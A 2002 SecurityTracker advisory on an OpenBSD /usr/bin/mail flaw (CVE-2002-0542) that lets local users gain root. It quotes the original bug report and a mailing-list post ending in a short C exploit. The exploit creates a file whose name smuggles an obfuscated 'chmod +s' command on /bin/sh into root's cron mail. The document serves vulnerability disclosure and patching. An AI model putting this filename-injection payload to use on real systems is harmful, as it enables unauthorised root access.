OpenBSD '/usr/bin/mail' May Let Local Users Execute Commands With Root Privileges By Specifying a Malicious Crontab Entry
|
|
SecurityTracker Alert ID: 1004024 |
|
SecurityTracker URL: http://securitytracker.com/id/1004024
|
|
CVE Reference:
CVE-2002-0542
(Links to External Site)
|
Updated: Apr 30 2004
|
Original Entry Date: Apr 11 2002
|
Impact:
Execution of arbitrary code via local system, Root access via local system
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
|
Description:
A vulnerability was reported in '/usr/bin/mail' on OpenBSD. A local user that can specify a crontab entry may be able to cause arbitrary shell commands to be executed on the system with root level privileges.
It is reported that /usr/bin/mail allows a special escape sequence to be specified in the body of an email. This escape sequence specifies a shell comand to be executed, as described in the mail(1) man page:
~!command
A local user that can specify a cron file name may be able to cause arbitrary commands to be executed with root privileges when the cron job is run.
Demonstration exploit code is provided in the Source Message.
The author of the report credits urbanek@openbsd.cz for discovering vulnerability.
|
Impact:
A local user that can specify cronttab entries may be able to cause arbitrary shell commands to be execute with root privileges, giving that user root level access to the system.
|
Solution:
The vendor has developed a patch, available at:
http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
|
Vendor URL: www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24 (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
UNIX (OpenBSD)
|
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Thu, 11 Apr 2002 13:29:28 +0200
Subject: local root compromise in openbsd 3.0 and below
|
There is a local root compromise in OpenBSD 3.0-current (and below, before 8 Apr
2002).
Full problem report and exploit below. FreeBSD is not vulnerable.
----- Forwarded message from urbanek@openbsd.cz -----
From: urbanek@openbsd.cz
To: gnats@openbsd.org
Subject: user/2536: possible root compromise using /usr/bin/mail
>Number: 2536
>Category: user
>Synopsis: crontab entry allows possible arbitrary comand execution
>Confidential: yes
>Severity: critical
>Priority: high
>Responsible: bugs
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Mon Apr 8 13:30:02 MDT 2002
>Last-Modified:
>Originator: Milos Urbanek
>Organization:
>Release: all relases including CURRENT
>Environment:
System : OpenBSD 3.0
Architecture: OpenBSD.i386
Machine : i386
>Description:
program /usr/bin/mail allows a special escape sequence to
be specified in the body of an email; this escape sequence
specifies a shell comand to be executed
as mentioned in mail(1):
~!command
Execute the indicated shell command, then return to the message.
Problem:
default root crontab entry looks like:
# do daily/weekly/monthly maintenance
# on monday only (techie)
30 1 * * 1 /bin/sh /etc/daily 2>&1 | tee /var/log/d
aily.out | mail -s "`/bin/hostname` daily output" root
30 3 * * 6 /bin/sh /etc/weekly 2>&1 | tee /var/log/
weekly.out | mail -s "`/bin/hostname` weekly output" root
30 5 1 * * /bin/sh /etc/monthly 2>&1 | tee /var/log/monthly.out | mail -s "`/bin/hostname` monthly output"
root
If there is something in files /etc/daily, /etc/weekly or /etc/monthly
which could enable the attacker to insert its own input,
like a malformed filename
chiba:5$ touch \~!haha
chiba:6$ ls -al *haha*
-rw-r--r-- 1 milos milos 0 Apr 8 19:30 ~!haha
or by other means like output from log files under /var/log,
the attacker can execute arbitrary comand running under root
privileges which can lead to the root compromise.
>How-To-Repeat:
read the man page, and see above
[...]
----- End forwarded message -----
Patch: http://www.openbsd.org/cgi-bin/cvsweb/src/usr.bin/mail/collect.c.diff?r1=1.23&r2=1.24
Exploit:
/*
* (c) 2002 venglin@freebsd.lublin.pl
*
* OpenBSD 3.0 (before 08 Apr 2002)
* /etc/security + /usr/bin/mail local root exploit
*
* Run the exploit and wait for /etc/daily executed from crontab.
* /bin/sh will be suid root next day morning.
*
* Credit goes to urbanek@openbsd.cz for discovering vulnerability.
*
*/
#include <fcntl.h>
int main(void)
{
int fd;
chdir("/tmp");
fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);
if (fd)
close(fd);
}
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
|
|
